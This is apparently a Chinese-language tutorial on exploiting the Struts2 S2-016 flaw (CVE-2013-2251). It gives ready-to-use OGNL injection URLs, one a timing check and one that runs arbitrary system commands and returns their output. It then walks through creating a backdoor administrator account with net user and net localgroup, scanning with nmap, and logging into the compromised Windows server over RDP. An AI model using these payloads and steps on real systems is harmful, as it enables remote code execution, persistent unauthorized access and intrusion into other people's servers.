Struts2-016命令执行漏洞

Struts2-016命令执行漏洞

一：前言

CVE-2013-2251 漏洞概述：

Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式，并将用户通过URL提交的内容拼接入Ognl表达式中，从而造成攻击者可以通过构造恶意URL来执行任意Java代码，进而可执行任意命令。redirect:和redirectAction:此两项前缀为Struts默认开启功能，目前Struts 2.3.15.1以下版本均存在此漏洞。

二：漏洞复现

★注：一般struts2漏洞有一个明显的特征就是url路径里有*.action或*.do

2.1：手工利用

2.1.1：POC验证

poc1：如果存在漏洞则目标服务器会在请求发出后停顿5秒后，把数据返回给浏览器

http://xxx.com/test.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET%27%29%28c%29%29&%28d%29%28%28%[email protected]@sleep%285000%29%27%29%28d%29%29

poc2：如果存在该漏洞，则会把命令ipconfig的执行结果返回

http://xxx.com/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(h)(('\43webRootzpro\[email protected]@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[200]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cmd%20/c%20ipconfig

2.1.2：验证结果

poc1：在经过5秒后返回请求结果

poc2：显示IP信息

2.2：工具利用

工具使用很简单，直接先检测验证漏洞是否存在，然后执行命令或者文件上传

3：漏洞利用

3.1：命令执行

• whoami：查看当前用户
• ipconfig/ifconfig：查看IP地址方便进行下一步的利用
• net user 111 111/add：添加用户（这里添加了一个密码为111用户名为111的用户
• net localgroup administrators 111/add：将111用户添加到administrator用户组里

3.2：nmap扫描查看开放端口

可以看到开放了3389远程连接端口，目标系统为Windows Server 2003 3790 Service Pack 2

3.3：远程连接

用添加的111用户远程连接

• win+R ，输入mstsc ，设置连接地址，在登陆界面输入新建用户名及密码，进行连接
• 连接成功，登陆入侵该服务器